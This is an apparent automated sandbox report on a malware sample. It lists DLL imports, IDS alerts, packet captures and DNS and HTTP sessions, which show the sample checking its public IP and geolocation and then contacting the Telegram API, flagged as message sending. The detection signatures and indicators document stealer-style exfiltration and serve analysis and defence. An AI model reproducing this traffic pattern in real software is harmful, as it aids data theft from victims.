OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-08T16:34:06.539976+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49704	158.101.44.242	80	TCP
2025-01-08T16:34:08.243110+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49704	158.101.44.242	80	TCP
2025-01-08T16:34:08.822609+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49706	188.114.96.3	443	TCP
2025-01-08T16:34:09.461856+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49707	158.101.44.242	80	TCP
2025-01-08T16:34:10.767457+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49708	188.114.96.3	443	TCP
2025-01-08T16:34:13.239180+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49712	188.114.96.3	443	TCP
2025-01-08T16:34:19.038055+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.5	49722	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2025 16:34:05.758656979 CET	49704	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:05.763504982 CET	80	49704	158.101.44.242	192.168.2.5
Jan 8, 2025 16:34:05.763592005 CET	49704	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:05.763961077 CET	49704	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:05.768712044 CET	80	49704	158.101.44.242	192.168.2.5
Jan 8, 2025 16:34:06.330434084 CET	80	49704	158.101.44.242	192.168.2.5
Jan 8, 2025 16:34:06.334458113 CET	49704	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:06.339672089 CET	80	49704	158.101.44.242	192.168.2.5
Jan 8, 2025 16:34:06.490525007 CET	80	49704	158.101.44.242	192.168.2.5
Jan 8, 2025 16:34:06.539975882 CET	49704	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:07.158384085 CET	49705	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:07.158432007 CET	443	49705	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:07.158495903 CET	49705	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:07.170644999 CET	49705	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:07.170655966 CET	443	49705	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:07.842408895 CET	443	49705	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:07.842536926 CET	49705	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:07.847898006 CET	49705	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:07.847907066 CET	443	49705	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:07.848193884 CET	443	49705	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:07.891769886 CET	49705	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:07.935333967 CET	443	49705	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:08.002306938 CET	443	49705	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:08.002371073 CET	443	49705	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:08.002434015 CET	49705	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:08.009886026 CET	49705	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:08.018110037 CET	49704	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:08.023123980 CET	80	49704	158.101.44.242	192.168.2.5
Jan 8, 2025 16:34:08.189841032 CET	80	49704	158.101.44.242	192.168.2.5
Jan 8, 2025 16:34:08.192157984 CET	49706	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:08.192207098 CET	443	49706	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:08.192296028 CET	49706	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:08.192614079 CET	49706	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:08.192630053 CET	443	49706	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:08.243109941 CET	49704	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:08.666974068 CET	443	49706	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:08.669969082 CET	49706	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:08.669989109 CET	443	49706	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:08.822619915 CET	443	49706	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:08.822681904 CET	443	49706	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:08.822870970 CET	49706	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:08.823446989 CET	49706	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:08.826554060 CET	49704	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:08.827780962 CET	49707	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:08.831720114 CET	80	49704	158.101.44.242	192.168.2.5
Jan 8, 2025 16:34:08.831793070 CET	49704	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:08.832653999 CET	80	49707	158.101.44.242	192.168.2.5
Jan 8, 2025 16:34:08.832792044 CET	49707	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:08.832834005 CET	49707	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:08.837589979 CET	80	49707	158.101.44.242	192.168.2.5
Jan 8, 2025 16:34:09.422110081 CET	80	49707	158.101.44.242	192.168.2.5
Jan 8, 2025 16:34:09.439728975 CET	49708	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:09.439788103 CET	443	49708	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:09.439858913 CET	49708	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:09.445205927 CET	49708	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:09.445221901 CET	443	49708	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:09.461855888 CET	49707	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:10.643891096 CET	443	49708	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:10.646018982 CET	49708	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:10.646045923 CET	443	49708	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:10.767527103 CET	443	49708	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:10.769093037 CET	443	49708	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:10.769170046 CET	49708	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:10.769407988 CET	49708	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:10.775047064 CET	49709	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:10.779860973 CET	80	49709	158.101.44.242	192.168.2.5
Jan 8, 2025 16:34:10.779951096 CET	49709	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:10.780014992 CET	49709	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:10.784826040 CET	80	49709	158.101.44.242	192.168.2.5
Jan 8, 2025 16:34:11.361742973 CET	80	49709	158.101.44.242	192.168.2.5
Jan 8, 2025 16:34:11.363107920 CET	49710	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:11.363164902 CET	443	49710	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:11.363250971 CET	49710	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:11.363568068 CET	49710	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:11.363583088 CET	443	49710	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:11.415117025 CET	49709	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:11.837677956 CET	443	49710	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:11.839338064 CET	49710	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:11.839368105 CET	443	49710	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:12.001703024 CET	443	49710	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:12.001770973 CET	443	49710	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:12.001836061 CET	49710	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:12.002415895 CET	49710	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:12.009150982 CET	49709	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:12.009733915 CET	49711	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:12.014184952 CET	80	49709	158.101.44.242	192.168.2.5
Jan 8, 2025 16:34:12.014255047 CET	49709	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:12.014462948 CET	80	49711	158.101.44.242	192.168.2.5
Jan 8, 2025 16:34:12.014512062 CET	49711	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:12.014612913 CET	49711	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:12.019279003 CET	80	49711	158.101.44.242	192.168.2.5
Jan 8, 2025 16:34:12.577009916 CET	80	49711	158.101.44.242	192.168.2.5
Jan 8, 2025 16:34:12.623099089 CET	49711	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:12.623800993 CET	49712	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:12.623843908 CET	443	49712	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:12.623910904 CET	49712	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:12.638732910 CET	49712	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:12.638744116 CET	443	49712	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:13.098479986 CET	443	49712	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:13.100549936 CET	49712	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:13.100591898 CET	443	49712	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:13.239228010 CET	443	49712	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:13.239293098 CET	443	49712	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:13.239336014 CET	49712	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:13.239902020 CET	49712	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:13.243100882 CET	49711	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:13.244138956 CET	49713	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:13.248074055 CET	80	49711	158.101.44.242	192.168.2.5
Jan 8, 2025 16:34:13.248145103 CET	49711	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:13.248908043 CET	80	49713	158.101.44.242	192.168.2.5
Jan 8, 2025 16:34:13.248969078 CET	49713	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:13.249078035 CET	49713	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:13.253823042 CET	80	49713	158.101.44.242	192.168.2.5
Jan 8, 2025 16:34:13.832098007 CET	80	49713	158.101.44.242	192.168.2.5
Jan 8, 2025 16:34:13.833623886 CET	49714	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:13.833682060 CET	443	49714	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:13.833755970 CET	49714	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:13.834047079 CET	49714	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:13.834059000 CET	443	49714	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:13.883723974 CET	49713	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:14.302059889 CET	443	49714	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:14.304199934 CET	49714	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:14.304244995 CET	443	49714	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:14.434207916 CET	443	49714	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:14.434281111 CET	443	49714	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:14.434323072 CET	49714	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:14.434804916 CET	49714	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:14.440080881 CET	49713	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:14.441606045 CET	49715	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:14.445024967 CET	80	49713	158.101.44.242	192.168.2.5
Jan 8, 2025 16:34:14.445067883 CET	49713	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:14.447366953 CET	80	49715	158.101.44.242	192.168.2.5
Jan 8, 2025 16:34:14.447417974 CET	49715	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:14.447521925 CET	49715	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:14.453510046 CET	80	49715	158.101.44.242	192.168.2.5
Jan 8, 2025 16:34:15.013839006 CET	80	49715	158.101.44.242	192.168.2.5
Jan 8, 2025 16:34:15.015091896 CET	49716	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:15.015132904 CET	443	49716	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:15.015197039 CET	49716	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:15.015528917 CET	49716	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:15.015539885 CET	443	49716	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:15.055600882 CET	49715	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:15.505503893 CET	443	49716	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:15.507356882 CET	49716	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:15.507400990 CET	443	49716	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:15.653157949 CET	443	49716	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:15.653223991 CET	443	49716	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:15.653310061 CET	49716	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:15.660023928 CET	49716	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:15.665874958 CET	49715	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:15.667062998 CET	49717	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:15.670908928 CET	80	49715	158.101.44.242	192.168.2.5
Jan 8, 2025 16:34:15.670974016 CET	49715	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:15.671892881 CET	80	49717	158.101.44.242	192.168.2.5
Jan 8, 2025 16:34:15.671957016 CET	49717	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:15.672017097 CET	49717	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:15.676799059 CET	80	49717	158.101.44.242	192.168.2.5
Jan 8, 2025 16:34:16.242654085 CET	80	49717	158.101.44.242	192.168.2.5
Jan 8, 2025 16:34:16.245058060 CET	49718	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:16.245115995 CET	443	49718	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:16.245193958 CET	49718	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:16.245488882 CET	49718	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:16.245507956 CET	443	49718	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:16.290055037 CET	49717	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:16.729247093 CET	443	49718	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:16.730799913 CET	49718	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:16.730823040 CET	443	49718	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:16.902390003 CET	443	49718	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:16.902539968 CET	443	49718	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:16.902606964 CET	49718	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:16.903126001 CET	49718	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:16.908576012 CET	49717	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:16.909658909 CET	49719	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:16.913731098 CET	80	49717	158.101.44.242	192.168.2.5
Jan 8, 2025 16:34:16.913804054 CET	49717	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:16.914463043 CET	80	49719	158.101.44.242	192.168.2.5
Jan 8, 2025 16:34:16.914524078 CET	49719	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:16.914609909 CET	49719	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:16.919780016 CET	80	49719	158.101.44.242	192.168.2.5
Jan 8, 2025 16:34:17.476406097 CET	80	49719	158.101.44.242	192.168.2.5
Jan 8, 2025 16:34:17.477777004 CET	49720	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:17.477823973 CET	443	49720	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:17.477910995 CET	49720	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:17.478154898 CET	49720	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:17.478168011 CET	443	49720	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:17.524374962 CET	49719	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:17.947828054 CET	443	49720	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:17.949551105 CET	49720	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:17.949583054 CET	443	49720	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:18.130091906 CET	443	49720	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:18.130255938 CET	443	49720	188.114.96.3	192.168.2.5
Jan 8, 2025 16:34:18.130398035 CET	49720	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:18.131006002 CET	49720	443	192.168.2.5	188.114.96.3
Jan 8, 2025 16:34:18.163069010 CET	49719	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:18.168200970 CET	80	49719	158.101.44.242	192.168.2.5
Jan 8, 2025 16:34:18.168257952 CET	49719	80	192.168.2.5	158.101.44.242
Jan 8, 2025 16:34:18.171372890 CET	49722	443	192.168.2.5	149.154.167.220
Jan 8, 2025 16:34:18.171422005 CET	443	49722	149.154.167.220	192.168.2.5
Jan 8, 2025 16:34:18.171482086 CET	49722	443	192.168.2.5	149.154.167.220
Jan 8, 2025 16:34:18.171916962 CET	49722	443	192.168.2.5	149.154.167.220
Jan 8, 2025 16:34:18.171942949 CET	443	49722	149.154.167.220	192.168.2.5
Jan 8, 2025 16:34:18.787805080 CET	443	49722	149.154.167.220	192.168.2.5
Jan 8, 2025 16:34:18.787913084 CET	49722	443	192.168.2.5	149.154.167.220
Jan 8, 2025 16:34:18.789577961 CET	49722	443	192.168.2.5	149.154.167.220
Jan 8, 2025 16:34:18.789587975 CET	443	49722	149.154.167.220	192.168.2.5
Jan 8, 2025 16:34:18.789979935 CET	443	49722	149.154.167.220	192.168.2.5
Jan 8, 2025 16:34:18.791446924 CET	49722	443	192.168.2.5	149.154.167.220
Jan 8, 2025 16:34:18.839332104 CET	443	49722	149.154.167.220	192.168.2.5
Jan 8, 2025 16:34:19.038105011 CET	443	49722	149.154.167.220	192.168.2.5
Jan 8, 2025 16:34:19.038203001 CET	443	49722	149.154.167.220	192.168.2.5
Jan 8, 2025 16:34:19.038255930 CET	49722	443	192.168.2.5	149.154.167.220
Jan 8, 2025 16:34:19.042527914 CET	49722	443	192.168.2.5	149.154.167.220
Jan 8, 2025 16:34:20.673682928 CET	49175	53	192.168.2.5	1.1.1.1
Jan 8, 2025 16:34:20.679115057 CET	53	49175	1.1.1.1	192.168.2.5
Jan 8, 2025 16:34:20.679188013 CET	49175	53	192.168.2.5	1.1.1.1
Jan 8, 2025 16:34:20.684772968 CET	53	49175	1.1.1.1	192.168.2.5
Jan 8, 2025 16:34:21.196263075 CET	49175	53	192.168.2.5	1.1.1.1
Jan 8, 2025 16:34:21.629179955 CET	49175	53	192.168.2.5	1.1.1.1
Jan 8, 2025 16:34:21.719726086 CET	53	49175	1.1.1.1	192.168.2.5
Jan 8, 2025 16:34:21.719896078 CET	49175	53	192.168.2.5	1.1.1.1
Jan 8, 2025 16:34:25.086671114 CET	49707	80	192.168.2.5	158.101.44.242

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2025 16:34:05.738419056 CET	50553	53	192.168.2.5	1.1.1.1
Jan 8, 2025 16:34:05.747453928 CET	53	50553	1.1.1.1	192.168.2.5
Jan 8, 2025 16:34:07.150211096 CET	56231	53	192.168.2.5	1.1.1.1
Jan 8, 2025 16:34:07.157674074 CET	53	56231	1.1.1.1	192.168.2.5
Jan 8, 2025 16:34:18.163695097 CET	60645	53	192.168.2.5	1.1.1.1
Jan 8, 2025 16:34:18.170725107 CET	53	60645	1.1.1.1	192.168.2.5
Jan 8, 2025 16:34:20.673202991 CET	53	58793	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 8, 2025 16:34:05.738419056 CET	192.168.2.5	1.1.1.1	0x136e	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 8, 2025 16:34:07.150211096 CET	192.168.2.5	1.1.1.1	0xf9a0	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jan 8, 2025 16:34:18.163695097 CET	192.168.2.5	1.1.1.1	0x27d6	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 8, 2025 16:34:05.747453928 CET	1.1.1.1	192.168.2.5	0x136e	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 8, 2025 16:34:05.747453928 CET	1.1.1.1	192.168.2.5	0x136e	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 8, 2025 16:34:05.747453928 CET	1.1.1.1	192.168.2.5	0x136e	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 8, 2025 16:34:05.747453928 CET	1.1.1.1	192.168.2.5	0x136e	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 8, 2025 16:34:05.747453928 CET	1.1.1.1	192.168.2.5	0x136e	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 8, 2025 16:34:05.747453928 CET	1.1.1.1	192.168.2.5	0x136e	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 8, 2025 16:34:07.157674074 CET	1.1.1.1	192.168.2.5	0xf9a0	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Jan 8, 2025 16:34:07.157674074 CET	1.1.1.1	192.168.2.5	0xf9a0	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Jan 8, 2025 16:34:18.170725107 CET	1.1.1.1	192.168.2.5	0x27d6	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	158.101.44.242	80	5004	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 16:34:05.763961077 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 8, 2025 16:34:06.330434084 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 15:34:06 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 71b8e0fcfdc4b76d26cb756594150a85 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 8, 2025 16:34:06.334458113 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 8, 2025 16:34:06.490525007 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 15:34:06 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0ae4df3ca3260e3bf90afee1b31a372f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 8, 2025 16:34:08.018110037 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 8, 2025 16:34:08.189841032 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 15:34:08 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 02708e6043444d894ad6bc761968d57a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49707	158.101.44.242	80	5004	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 16:34:08.832834005 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 8, 2025 16:34:09.422110081 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 15:34:09 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 85a1ea069c3feca9087b8965f6de1d36 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49709	158.101.44.242	80	5004	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 16:34:10.780014992 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
